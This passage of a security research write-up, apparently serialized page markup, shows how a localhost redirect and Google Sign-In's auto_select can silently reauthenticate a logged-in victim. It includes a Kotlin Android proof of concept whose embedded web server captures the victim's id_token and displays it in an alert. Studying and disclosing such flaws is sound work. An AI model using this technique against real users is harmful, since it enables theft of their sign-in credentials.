\"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n",{"type":24,"tag":301,"props":107089,"children":107090},{"class":303,"line":643},[107091,107095,107099,107103,107107,107111,107115],{"type":24,"tag":301,"props":107092,"children":107093},{"style":348},[107094],{"type":30,"value":77412},{"type":24,"tag":301,"props":107096,"children":107097},{"style":359},[107098],{"type":30,"value":77438},{"type":24,"tag":301,"props":107100,"children":107101},{"style":385},[107102],{"type":30,"value":523},{"type":24,"tag":301,"props":107104,"children":107105},{"style":314},[107106],{"type":30,"value":77447},{"type":24,"tag":301,"props":107108,"children":107109},{"style":359},[107110],{"type":30,"value":77452},{"type":24,"tag":301,"props":107112,"children":107113},{"style":314},[107114],{"type":30,"value":45949},{"type":24,"tag":301,"props":107116,"children":107117},{"style":359},[107118],{"type":30,"value":77461},{"type":24,"tag":301,"props":107120,"children":107121},{"class":303,"line":652},[107122,107126],{"type":24,"tag":301,"props":107123,"children":107124},{"style":314},[107125],{"type":30,"value":77469},{"type":24,"tag":301,"props":107127,"children":107128},{"style":359},[107129],{"type":30,"value":77474},{"type":24,"tag":301,"props":107131,"children":107132},{"class":303,"line":666},[107133],{"type":24,"tag":301,"props":107134,"children":107135},{"style":359},[107136],{"type":30,"value":501},{"type":24,"tag":301,"props":107138,"children":107139},{"class":303,"line":674},[107140],{"type":24,"tag":301,"props":107141,"children":107142},{"emptyLinePlaceholder":16},[107143],{"type":30,"value":341},{"type":24,"tag":301,"props":107145,"children":107146},{"class":303,"line":692},[107147,107151,107155,107159],{"type":24,"tag":301,"props":107148,"children":107149},{"style":348},[107150],{"type":30,"value":77496},{"type":24,"tag":301,"props":107152,"children":107153},{"style":348},[107154],{"type":30,"value":13026},{"type":24,"tag":301,"props":107156,"children":107157},{"style":314},[107158],{"type":30,"value":77505},{"type":24,"tag":301,"props":107160,"children":107161},{"style":359},[107162],{"type":30,"value":3883},{"type":24,"tag":301,"props":107164,"children":107165},{"class":303,"line":3631},[107166,107170,107174,107178,107182],{"type":24,"tag":301,"props":107167,"children":107168},{"style":314},[107169],{"type":30,"value":77517},{"type":24,"tag":301,"props":107171,"children":107172},{"style":359},[107173],{"type":30,"value":77522},{"type":24,"tag":301,"props":107175,"children":107176},{"style":385},[107177],{"type":30,"value":523},{"type":24,"tag":301,"props":107179,"children":107180},{"style":466},[107181],{"type":30,"value":77531},{"type":24,"tag":301,"props":107183,"children":107184},{"style":359},[107185],{"type":30,"value":398},{"type":24,"tag":301,"props":107187,"children":107188},{"class":303,"line":3639},[107189,107193],{"type":24,"tag":301,"props":107190,"children":107191},{"style":314},[107192],{"type":30,"value":77543},{"type":24,"tag":301,"props":107194,"children":107195},{"style":359},[107196],{"type":30,"value":3035},{"type":24,"tag":301,"props":107198,"children":107199},{"class":303,"line":3647},[107200,107204,107208,107212],{"type":24,"tag":301,"props":107201,"children":107202},{"style":348},[107203],{"type":30,"value":77555},{"type":24,"tag":301,"props":107205,"children":107206},{"style":359},[107207],{"type":30,"value":362},{"type":24,"tag":301,"props":107209,"children":107210},{"style":329},[107211],{"type":30,"value":77564},{"type":24,"tag":301,"props":107213,"children":107214},{"style":359},[107215],{"type":30,"value":398},{"type":24,"tag":301,"props":107217,"children":107218},{"class":303,"line":3685},[107219,107223,107227],{"type":24,"tag":301,"props":107220,"children":107221},{"style":359},[107222],{"type":30,"value":77576},{"type":24,"tag":301,"props":107224,"children":107225},{"style":314},[107226],{"type":30,"value":77581},{"type":24,"tag":301,"props":107228,"children":107229},{"style":359},[107230],{"type":30,"value":3035},{"type":24,"tag":301,"props":107232,"children":107233},{"class":303,"line":3713},[107234,107238],{"type":24,"tag":301,"props":107235,"children":107236},{"style":314},[107237],{"type":30,"value":77593},{"type":24,"tag":301,"props":107239,"children":107240},{"style":359},[107241],{"type":30,"value":3035},{"type":24,"tag":301,"props":107243,"children":107244},{"class":303,"line":3721},[107245,107249,107253,107257,107261],{"type":24,"tag":301,"props":107246,"children":107247},{"style":314},[107248],{"type":30,"value":77605},{"type":24,"tag":301,"props":107250,"children":107251},{"style":359},[107252],{"type":30,"value":77610},{"type":24,"tag":301,"props":107254,"children":107255},{"style":385},[107256],{"type":30,"value":523},{"type":24,"tag":301,"props":107258,"children":107259},{"style":329},[107260],{"type":30,"value":77619},{"type":24,"tag":301,"props":107262,"children":107263},{"style":359},[107264],{"type":30,"value":791},{"type":24,"tag":301,"props":107266,"children":107267},{"class":303,"line":3751},[107268,107272,107276,107280,107284,107288,107292,107296],{"type":24,"tag":301,"props":107269,"children":107270},{"style":314},[107271],{"type":30,"value":77605},{"type":24,"tag":301,"props":107273,"children":107274},{"style":359},[107275],{"type":30,"value":77635},{"type":24,"tag":301,"props":107277,"children":107278},{"style":385},[107279],{"type":30,"value":523},{"type":24,"tag":301,"props":107281,"children":107282},{"style":329},[107283],{"type":30,"value":77644},{"type":24,"tag":301,"props":107285,"children":107286},{"style":359},[107287],{"type":30,"value":77649},{"type":24,"tag":301,"props":107289,"children":107290},{"style":385},[107291],{"type":30,"value":523},{"type":24,"tag":301,"props":107293,"children":107294},{"style":329},[107295],{"type":30,"value":77658},{"type":24,"tag":301,"props":107297,"children":107298},{"style":359},[107299],{"type":30,"value":791},{"type":24,"tag":301,"props":107301,"children":107302},{"class":303,"line":3782},[107303,107307,107311,107315],{"type":24,"tag":301,"props":107304,"children":107305},{"style":314},[107306],{"type":30,"value":77670},{"type":24,"tag":301,"props":107308,"children":107309},{"style":359},[107310],{"type":30,"value":362},{"type":24,"tag":301,"props":107312,"children":107313},{"style":329},[107314],{"type":30,"value":77679},{"type":24,"tag":301,"props":107316,"children":107317},{"style":359},[107318],{"type":30,"value":791},{"type":24,"tag":301,"props":107320,"children":107321},{"class":303,"line":3791},[107322],{"type":24,"tag":301,"props":107323,"children":107324},{"style":359},[107325],{"type":30,"value":77691},{"type":24,"tag":301,"props":107327,"children":107328},{"class":303,"line":3819},[107329,107333],{"type":24,"tag":301,"props":107330,"children":107331},{"style":314},[107332],{"type":30,"value":77699},{"type":24,"tag":301,"props":107334,"children":107335},{"style":359},[107336],{"type":30,"value":3035},{"type":24,"tag":301,"props":107338,"children":107339},{"class":303,"line":4397},[107340,107344,107348,107352,107356],{"type":24,"tag":301,"props":107341,"children":107342},{"style":314},[107343],{"type":30,"value":77711},{"type":24,"tag":301,"props":107345,"children":107346},{"style":359},[107347],{"type":30,"value":16392},{"type":24,"tag":301,"props":107349,"children":107350},{"style":385},[107351],{"type":30,"value":11206},{"type":24,"tag":301,"props":107353,"children":107354},{"style":329},[107355],{"type":30,"value":77724},{"type":24,"tag":301,"props":107357,"children":107358},{"style":359},[107359],{"type":30,"value":16401},{"type":24,"tag":301,"props":107361,"children":107362},{"class":303,"line":4405},[107363,107367],{"type":24,"tag":301,"props":107364,"children":107365},{"style":314},[107366],{"type":30,"value":77736},{"type":24,"tag":301,"props":107368,"children":107369},{"style":359},[107370],{"type":30,"value":3035},{"type":24,"tag":301,"props":107372,"children":107373},{"class":303,"line":4422},[107374,107378],{"type":24,"tag":301,"props":107375,"children":107376},{"style":385},[107377],{"type":30,"value":77748},{"type":24,"tag":301,"props":107379,"children":107380},{"style":329},[107381],{"type":30,"value":107382},"\"document.body.innerText = location.hash;\"\n",{"type":24,"tag":301,"props":107384,"children":107385},{"class":303,"line":4438},[107386],{"type":24,"tag":301,"props":107387,"children":107388},{"style":359},[107389],{"type":30,"value":77761},{"type":24,"tag":301,"props":107391,"children":107392},{"class":303,"line":4446},[107393],{"type":24,"tag":301,"props":107394,"children":107395},{"style":359},[107396],{"type":30,"value":77691},{"type":24,"tag":301,"props":107398,"children":107399},{"class":303,"line":4506},[107400],{"type":24,"tag":301,"props":107401,"children":107402},{"style":359},[107403],{"type":30,"value":77776},{"type":24,"tag":301,"props":107405,"children":107406},{"class":303,"line":4566},[107407],{"type":24,"tag":301,"props":107408,"children":107409},{"style":359},[107410],{"type":30,"value":4211},{"type":24,"tag":301,"props":107412,"children":107413},{"class":303,"line":4574},[107414],{"type":24,"tag":301,"props":107415,"children":107416},{"style":359},[107417],{"type":30,"value":65600},{"type":24,"tag":301,"props":107419,"children":107420},{"class":303,"line":4590},[107421,107425,107429,107433,107437,107441],{"type":24,"tag":301,"props":107422,"children":107423},{"style":359},[107424],{"type":30,"value":77798},{"type":24,"tag":301,"props":107426,"children":107427},{"style":314},[107428],{"type":30,"value":77803},{"type":24,"tag":301,"props":107430,"children":107431},{"style":359},[107432],{"type":30,"value":77808},{"type":24,"tag":301,"props":107434,"children":107435},{"style":385},[107436],{"type":30,"value":523},{"type":24,"tag":301,"props":107438,"children":107439},{"style":348},[107440],{"type":30,"value":3440},{"type":24,"tag":301,"props":107442,"children":107443},{"style":359},[107444],{"type":30,"value":791},{"type":24,"tag":301,"props":107446,"children":107447},{"class":303,"line":4599},[107448],{"type":24,"tag":301,"props":107449,"children":107450},{"style":359},[107451],{"type":30,"value":501},{"type":24,"tag":32,"props":107453,"children":107454},{},[107455],{"type":30,"value":107456},"In this case, the prompt parameter can be omitted from the URL. This way, if the victim is already logged in, the OAuth 2.0 prompt interaction will be skipped.",{"type":24,"tag":32,"props":107458,"children":107459},{},[107460,107462,107468],{"type":30,"value":107461},"If Google Sign-In (GSI) is being used, we found that it's possible to use the ",{"type":24,"tag":145,"props":107463,"children":107465},{"className":107464},[],[107466],{"type":30,"value":107467},"auto_select",{"type":30,"value":107469}," parameter to trigger automatic reauthentication and bypass user interaction:",{"type":24,"tag":291,"props":107471,"children":107473},{"className":106829,"code":107472,"language":106831,"meta":7,"style":7}," override fun onCreate(savedInstanceState: Bundle?) {\n super.onCreate(savedInstanceState)\n\n CoroutineScope(Dispatchers.IO).launch {\n try {\n startWebServer()\n Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n } catch (e: Exception) {\n Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n }\n }\n\n val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(\"http://localhost:3000\"))\n startActivity(browserIntent)\n }\n\n private fun startWebServer() {\n embeddedServer(CIO, port = 3000) {\n routing {\n get(\"{...}\") {\n call.respondHtml {\n head {\n title(\"Test\")\n script {\n src = \"https://accounts.google.com/gsi/client\"\n attributes[\"async\"] = \"\"\n attributes[\"defer\"] = \"\"\n }\n script {\n unsafe {\n +\"\"\"\n function handleCredentialResponse(response) {\n alert(\"credential: \" + response.credential);\n }\n\n window.onload = async function () {\n const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n const client_id = oauth_url.searchParams.get(\"client_id\");\n google.accounts.id.initialize({\n client_id: client_id,\n callback: handleCredentialResponse,\n auto_select: true\n });\n\n google.accounts.id.renderButton(\n document.getElementById(\"g_id_signin\"),\n { theme: \"outline\", size: \"large\" }\n );\n\n google.accounts.id.prompt();\n };\n \"\"\".trimIndent()\n }\n }\n }\n body {\n h1 { +\"Login here:\" }\n div {\n id = \"g_id_signin\"\n }\n }\n }\n }\n }\n }.start(wait = true)\n }\n",[107474],{"type":24,"tag":145,"props":107475,"children":107476},{"__ignoreMap":7},[107477,107504,107523,107530,107549,107560,107571,107602,107625,107672,107679,107686,107693,107733,107744,107751,107758,107777,107800,107811,107830,107845,107856,107876,107887,107904,107930,107954,107961,107972,107984,107997,108005,108013,108020,108027,108035,108043,108051,108059,108067,108075,108083,108090,108097,108105,108113,108121,108128,108135,108143,108150,108171,108179,108186,108193,108204,108228,108240,108257,108264,108271,108279,108287,108295,108323],{"type":24,"tag":301,"props":107478,"children":107479},{"class":303,"line":304},[107480,107484,107488,107492,107496,107500],{"type":24,"tag":301,"props":107481,"children":107482},{"style":348},[107483],{"type":30,"value":77157},{"type":24,"tag":301,"props":107485,"children":107486},{"style":348},[107487],{"type":30,"value":13026},{"type":24,"tag":301,"props":107489,"children":107490},{"style":314},[107491],{"type":30,"value":77166},{"type":24,"tag":301,"props":107493,"children":107494},{"style":359},[107495],{"type":30,"value":77171},{"type":24,"tag":301,"props":107497,"children":107498},{"style":10246},[107499],{"type":30,"value":77176},{"type":24,"tag":301,"props":107501,"children":107502},{"style":359},[107503],{"type":30,"value":77181},{"type":24,"tag":301,"props":107505,"children":107506},{"class":303,"line":320},[107507,107511,107515,107519],{"type":24,"tag":301,"props":107508,"children":107509},{"style":348},[107510],{"type":30,"value":77189},{"type":24,"tag":301,"props":107512,"children":107513},{"style":359},[107514],{"type":30,"value":206},{"type":24,"tag":301,"props":107516,"children":107517},{"style":314},[107518],{"type":30,"value":77198},{"type":24,"tag":301,"props":107520,"children":107521},{"style":359},[107522],{"type":30,"value":77203},{"type":24,"tag":301,"props":107524,"children":107525},{"class":303,"line":335},[107526],{"type":24,"tag":301,"props":107527,"children":107528},{"emptyLinePlaceholder":16},[107529],{"type":30,"value":341},{"type":24,"tag":301,"props":107531,"children":107532},{"class":303,"line":344},[107533,107537,107541,107545],{"type":24,"tag":301,"props":107534,"children":107535},{"style":314},[107536],{"type":30,"value":77226},{"type":24,"tag":301,"props":107538,"children":107539},{"style":359},[107540],{"type":30,"value":77231},{"type":24,"tag":301,"props":107542,"children":107543},{"style":314},[107544],{"type":30,"value":77236},{"type":24,"tag":301,"props":107546,"children":107547},{"style":359},[107548],{"type":30,"value":3035},{"type":24,"tag":301,"props":107550,"children":107551},{"class":303,"line":401},[107552,107556],{"type":24,"tag":301,"props":107553,"children":107554},{"style":308},[107555],{"type":30,"value":77248},{"type":24,"tag":301,"props":107557,"children":107558},{"style":359},[107559],{"type":30,"value":3035},{"type":24,"tag":301,"props":107561,"children":107562},{"class":303,"line":415},[107563,107567],{"type":24,"tag":301,"props":107564,"children":107565},{"style":314},[107566],{"type":30,"value":77260},{"type":24,"tag":301,"props":107568,"children":107569},{"style":359},[107570],{"type":30,"value":14551},{"type":24,"tag":301,"props":107572,"children":107573},{"class":303,"line":439},[107574,107578,107582,107586,107590,107594,107598],{"type":24,"tag":301,"props":107575,"children":107576},{"style":359},[107577],{"type":30,"value":77272},{"type":24,"tag":301,"props":107579,"children":107580},{"style":314},[107581],{"type":30,"value":77277},{"type":24,"tag":301,"props":107583,"children":107584},{"style":359},[107585],{"type":30,"value":362},{"type":24,"tag":301,"props":107587,"children":107588},{"style":329},[107589],{"type":30,"value":77286},{"type":24,"tag":301,"props":107591,"children":107592},{"style":359},[107593],{"type":30,"value":377},{"type":24,"tag":301,"props":107595,"children":107596},{"style":329},[107597],{"type":30,"value":77295},{"type":24,"tag":301,"props":107599,"children":107600},{"style":359},[107601],{"type":30,"value":791},{"type":24,"tag":301,"props":107603,"children":107604},{"class":303,"line":447},[107605,107609,107613,107617,107621],{"type":24,"tag":301,"props":107606,"children":107607},{"style":359},[107608],{"type":30,"value":77307},{"type":24,"tag":301,"props":107610,"children":107611},{"style":348},[107612],{"type":30,"value":55146},{"type":24,"tag":301,"props":107614,"children":107615},{"style":359},[107616],{"type":30,"value":77316},{"type":24,"tag":301,"props":107618,"children":107619},{"style":10246},[107620],{"type":30,"value":77321},{"type":24,"tag":301,"props":107622,"children":107623},{"style":359},[107624],{"type":30,"value":398},{"type":24,"tag":301,"props":107626,"children":107627},{"class":303,"line":476},[107628,107632,107636,107640,107644,107648,107652,107656,107660,107664,107668],{"type":24,"tag":301,"props":107629,"children":107630},{"style":359},[107631],{"type":30,"value":77272},{"type":24,"tag":301,"props":107633,"children":107634},{"style":314},[107635],{"type":30,"value":58179},{"type":24,"tag":301,"props":107637,"children":107638},{"style":359},[107639],{"type":30,"value":362},{"type":24,"tag":301,"props":107641,"children":107642},{"style":329},[107643],{"type":30,"value":77286},{"type":24,"tag":301,"props":107645,"children":107646},{"style":359},[107647],{"type":30,"value":377},{"type":24,"tag":301,"props":107649,"children":107650},{"style":329},[107651],{"type":30,"value":77353},{"type":24,"tag":301,"props":107653,"children":107654},{"style":348},[107655],{"type":30,"value":40857},{"type":24,"tag":301,"props":107657,"children":107658},{"style":385},[107659],{"type":30,"value":77362},{"type":24,"tag":301,"props":107661,"children":107662},{"style":348},[107663],{"type":30,"value":40889},{"type":24,"tag":301,"props":107665,"children":107666},{"style":329},[107667],{"type":30,"value":9408},{"type":24,"tag":301,"props":107669,"children":107670},{"style":359},[107671],{"type":30,"value":77375},{"type":24,"tag":301,"props":107673,"children":107674},{"class":303,"line":495},[107675],{"type":24,"tag":301,"props":107676,"children":107677},{"style":359},[107678],{"type":30,"value":65600},{"type":24,"tag":301,"props":107680,"children":107681},{"class":303,"line":504},[107682],{"type":24,"tag":301,"props":107683,"children":107684},{"style":359},[107685],{"type":30,"value":3345},{"type":24,"tag":301,"props":107687,"children":107688},{"class":303,"line":512},[107689],{"type":24,"tag":301,"props":107690,"children":107691},{"emptyLinePlaceholder":16},[107692],{"type":30,"value":341},{"type":24,"tag":301,"props":107694,"children":107695},{"class":303,"line":592},[107696,107700,107704,107708,107712,107716,107720,107724,107729],{"type":24,"tag":301,"props":107697,"children":107698},{"style":348},[107699],{"type":30,"value":77412},{"type":24,"tag":301,"props":107701,"children":107702},{"style":359},[107703],{"type":30,"value":77438},{"type":24,"tag":301,"props":107705,"children":107706},{"style":385},[107707],{"type":30,"value":523},{"type":24,"tag":301,"props":107709,"children":107710},{"style":314},[107711],{"type":30,"value":77447},{"type":24,"tag":301,"props":107713,"children":107714},{"style":359},[107715],{"type":30,"value":77452},{"type":24,"tag":301,"props":107717,"children":107718},{"style":314},[107719],{"type":30,"value":45949},{"type":24,"tag":301,"props":107721,"children":107722},{"style":359},[107723],{"type":30,"value":362},{"type":24,"tag":301,"props":107725,"children":107726},{"style":329},[107727],{"type":30,"value":107728},"\"http://localhost:3000\"",{"type":24,"tag":301,"props":107730,"children":107731},{"style":359},[107732],{"type":30,"value":9381},{"type":24,"tag":301,"props":107734,"children":107735},{"class":303,"line":619},[107736,107740],{"type":24,"tag":301,"props":107737,"children":107738},{"style":314},[107739],{"type":30,"value":77469},{"type":24,"tag":301,"props":107741,"children":107742},{"style":359},[107743],{"type":30,"value":77474},{"type":24,"tag":301,"props":107745,"children":107746},{"class":303,"line":635},[107747],{"type":24,"tag":301,"props":107748,"children":107749},{"style":359},[107750],{"type":30,"value":501},{"type":24,"tag":301,"props":107752,"children":107753},{"class":303,"line":643},[107754],{"type":24,"tag":301,"props":107755,"children":107756},{"emptyLinePlaceholder":16},[107757],{"type":30,"value":341},{"type":24,"tag":301,"props":107759,"children":107760},{"class":303,"line":652},[107761,107765,107769,107773],{"type":24,"tag":301,"props":107762,"children":107763},{"style":348},[107764],{"type":30,"value":77496},{"type":24,"tag":301,"props":107766,"children":107767},{"style":348},[107768],{"type":30,"value":13026},{"type":24,"tag":301,"props":107770,"children":107771},{"style":314},[107772],{"type":30,"value":77505},{"type":24,"tag":301,"props":107774,"children":107775},{"style":359},[107776],{"type":30,"value":3883},{"type":24,"tag":301,"props":107778,"children":107779},{"class":303,"line":666},[107780,107784,107788,107792,107796],{"type":24,"tag":301,"props":107781,"children":107782},{"style":314},[107783],{"type":30,"value":77517},{"type":24,"tag":301,"props":107785,"children":107786},{"style":359},[107787],{"type":30,"value":77522},{"type":24,"tag":301,"props":107789,"children":107790},{"style":385},[107791],{"type":30,"value":523},{"type":24,"tag":301,"props":107793,"children":107794},{"style":466},[107795],{"type":30,"value":77531},{"type":24,"tag":301,"props":107797,"children":107798},{"style":359},[107799],{"type":30,"value":398},{"type":24,"tag":301,"props":107801,"children":107802},{"class":303,"line":674},[107803,107807],{"type":24,"tag":301,"props":107804,"children":107805},{"style":314},[107806],{"type":30,"value":77543},{"type":24,"tag":301,"props":107808,"children":107809},{"style":359},[107810],{"type":30,"value":3035},{"type":24,"tag":301,"props":107812,"children":107813},{"class":303,"line":692},[107814,107818,107822,107826],{"type":24,"tag":301,"props":107815,"children":107816},{"style":348},[107817],{"type":30,"value":77555},{"type":24,"tag":301,"props":107819,"children":107820},{"style":359},[107821],{"type":30,"value":362},{"type":24,"tag":301,"props":107823,"children":107824},{"style":329},[107825],{"type":30,"value":77564},{"type":24,"tag":301,"props":107827,"children":107828},{"style":359},[107829],{"type":30,"value":398},{"type":24,"tag":301,"props":107831,"children":107832},{"class":303,"line":3631},[107833,107837,107841],{"type":24,"tag":301,"props":107834,"children":107835},{"style":359},[107836],{"type":30,"value":77576},{"type":24,"tag":301,"props":107838,"children":107839},{"style":314},[107840],{"type":30,"value":77581},{"type":24,"tag":301,"props":107842,"children":107843},{"style":359},[107844],{"type":30,"value":3035},{"type":24,"tag":301,"props":107846,"children":107847},{"class":303,"line":3639},[107848,107852],{"type":24,"tag":301,"props":107849,"children":107850},{"style":314},[107851],{"type":30,"value":77593},{"type":24,"tag":301,"props":107853,"children":107854},{"style":359},[107855],{"type":30,"value":3035},{"type":24,"tag":301,"props":107857,"children":107858},{"class":303,"line":3647},[107859,107863,107867,107872],{"type":24,"tag":301,"props":107860,"children":107861},{"style":314},[107862],{"type":30,"value":77670},{"type":24,"tag":301,"props":107864,"children":107865},{"style":359},[107866],{"type":30,"value":362},{"type":24,"tag":301,"props":107868,"children":107869},{"style":329},[107870],{"type":30,"value":107871},"\"Test\"",{"type":24,"tag":301,"props":107873,"children":107874},{"style":359},[107875],{"type":30,"value":791},{"type":24,"tag":301,"props":107877,"children":107878},{"class":303,"line":3685},[107879,107883],{"type":24,"tag":301,"props":107880,"children":107881},{"style":314},[107882],{"type":30,"value":77736},{"type":24,"tag":301,"props":107884,"children":107885},{"style":359},[107886],{"type":30,"value":3035},{"type":24,"tag":301,"props":107888,"children":107889},{"class":303,"line":3713},[107890,107895,107899],{"type":24,"tag":301,"props":107891,"children":107892},{"style":359},[107893],{"type":30,"value":107894}," src ",{"type":24,"tag":301,"props":107896,"children":107897},{"style":385},[107898],{"type":30,"value":523},{"type":24,"tag":301,"props":107900,"children":107901},{"style":329},[107902],{"type":30,"value":107903}," \"https://accounts.google.com/gsi/client\"\n",{"type":24,"tag":301,"props":107905,"children":107906},{"class":303,"line":3721},[107907,107912,107917,107921,107925],{"type":24,"tag":301,"props":107908,"children":107909},{"style":359},[107910],{"type":30,"value":107911}," attributes[",{"type":24,"tag":301,"props":107913,"children":107914},{"style":329},[107915],{"type":30,"value":107916},"\"async\"",{"type":24,"tag":301,"props":107918,"children":107919},{"style":359},[107920],{"type":30,"value":1046},{"type":24,"tag":301,"props":107922,"children":107923},{"style":385},[107924],{"type":30,"value":523},{"type":24,"tag":301,"props":107926,"children":107927},{"style":329},[107928],{"type":30,"value":107929}," \"\"\n",{"type":24,"tag":301,"props":107931,"children":107932},{"class":303,"line":3751},[107933,107937,107942,107946,107950],{"type":24,"tag":301,"props":107934,"children":107935},{"style":359},[107936],{"type":30,"value":107911},{"type":24,"tag":301,"props":107938,"children":107939},{"style":329},[107940],{"type":30,"value":107941},"\"defer\"",{"type":24,"tag":301,"props":107943,"children":107944},{"style":359},[107945],{"type":30,"value":1046},{"type":24,"tag":301,"props":107947,"children":107948},{"style":385},[107949],{"type":30,"value":523},{"type":24,"tag":301,"props":107951,"children":107952},{"style":329},[107953],{"type":30,"value":107929},{"type":24,"tag":301,"props":107955,"children":107956},{"class":303,"line":3782},[107957],{"type":24,"tag":301,"props":107958,"children":107959},{"style":359},[107960],{"type":30,"value":77761},{"type":24,"tag":301,"props":107962,"children":107963},{"class":303,"line":3791},[107964,107968],{"type":24,"tag":301,"props":107965,"children":107966},{"style":314},[107967],{"type":30,"value":77736},{"type":24,"tag":301,"props":107969,"children":107970},{"style":359},[107971],{"type":30,"value":3035},{"type":24,"tag":301,"props":107973,"children":107974},{"class":303,"line":3819},[107975,107980],{"type":24,"tag":301,"props":107976,"children":107977},{"style":314},[107978],{"type":30,"value":107979}," unsafe",{"type":24,"tag":301,"props":107981,"children":107982},{"style":359},[107983],{"type":30,"value":3035},{"type":24,"tag":301,"props":107985,"children":107986},{"class":303,"line":4397},[107987,107992],{"type":24,"tag":301,"props":107988,"children":107989},{"style":385},[107990],{"type":30,"value":107991}," +",{"type":24,"tag":301,"props":107993,"children":107994},{"style":329},[107995],{"type":30,"value":107996},"\"\"\"\n",{"type":24,"tag":301,"props":107998,"children":107999},{"class":303,"line":4405},[108000],{"type":24,"tag":301,"props":108001,"children":108002},{"style":329},[108003],{"type":30,"value":108004}," function handleCredentialResponse(response) {\n",{"type":24,"tag":301,"props":108006,"children":108007},{"class":303,"line":4422},[108008],{"type":24,"tag":301,"props":108009,"children":108010},{"style":329},[108011],{"type":30,"value":108012}," alert(\"credential: \" + response.credential);\n",{"type":24,"tag":301,"props":108014,"children":108015},{"class":303,"line":4438},[108016],{"type":24,"tag":301,"props":108017,"children":108018},{"style":329},[108019],{"type":30,"value":501},{"type":24,"tag":301,"props":108021,"children":108022},{"class":303,"line":4446},[108023],{"type":24,"tag":301,"props":108024,"children":108025},{"emptyLinePlaceholder":16},[108026],{"type":30,"value":341},{"type":24,"tag":301,"props":108028,"children":108029},{"class":303,"line":4506},[108030],{"type":24,"tag":301,"props":108031,"children":108032},{"style":329},[108033],{"type":30,"value":108034}," window.onload = async function () {\n",{"type":24,"tag":301,"props":108036,"children":108037},{"class":303,"line":4566},[108038],{"type":24,"tag":301,"props":108039,"children":108040},{"style":329},[108041],{"type":30,"value":108042}," const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n",{"type":24,"tag":301,"props":108044,"children":108045},{"class":303,"line":4574},[108046],{"type":24,"tag":301,"props":108047,"children":108048},{"style":329},[108049],{"type":30,"value":108050}," const client_id = oauth_url.searchParams.get(\"client_id\");\n",{"type":24,"tag":301,"props":108052,"children":108053},{"class":303,"line":4590},[108054],{"type":24,"tag":301,"props":108055,"children":108056},{"style":329},[108057],{"type":30,"value":108058}," google.accounts.id.initialize({\n",{"type":24,"tag":301,"props":108060,"children":108061},{"class":303,"line":4599},[108062],{"type":24,"tag":301,"props":108063,"children":108064},{"style":329},[108065],{"type":30,"value":108066}," client_id: client_id,\n",{"type":24,"tag":301,"props":108068,"children":108069},{"class":303,"line":4629},[108070],{"type":24,"tag":301,"props":108071,"children":108072},{"style":329},[108073],{"type":30,"value":108074}," callback: handleCredentialResponse,\n",{"type":24,"tag":301,"props":108076,"children":108077},{"class":303,"line":4659},[108078],{"type":24,"tag":301,"props":108079,"children":108080},{"style":329},[108081],{"type":30,"value":108082}," auto_select: true\n",{"type":24,"tag":301,"props":108084,"children":108085},{"class":303,"line":4668},[108086],{"type":24,"tag":301,"props":108087,"children":108088},{"style":329},[108089],{"type":30,"value":14112},{"type":24,"tag":301,"props":108091,"children":108092},{"class":303,"line":4677},[108093],{"type":24,"tag":301,"props":108094,"children":108095},{"emptyLinePlaceholder":16},[108096],{"type":30,"value":341},{"type":24,"tag":301,"props":108098,"children":108099},{"class":303,"line":4697},[108100],{"type":24,"tag":301,"props":108101,"children":108102},{"style":329},[108103],{"type":30,"value":108104}," google.accounts.id.renderButton(\n",{"type":24,"tag":301,"props":108106,"children":108107},{"class":303,"line":4725},[108108],{"type":24,"tag":301,"props":108109,"children":108110},{"style":329},[108111],{"type":30,"value":108112}," document.getElementById(\"g_id_signin\"),\n",{"type":24,"tag":301,"props":108114,"children":108115},{"class":303,"line":4733},[108116],{"type":24,"tag":301,"props":108117,"children":108118},{"style":329},[108119],{"type":30,"value":108120}," { theme: \"outline\", size: \"large\" 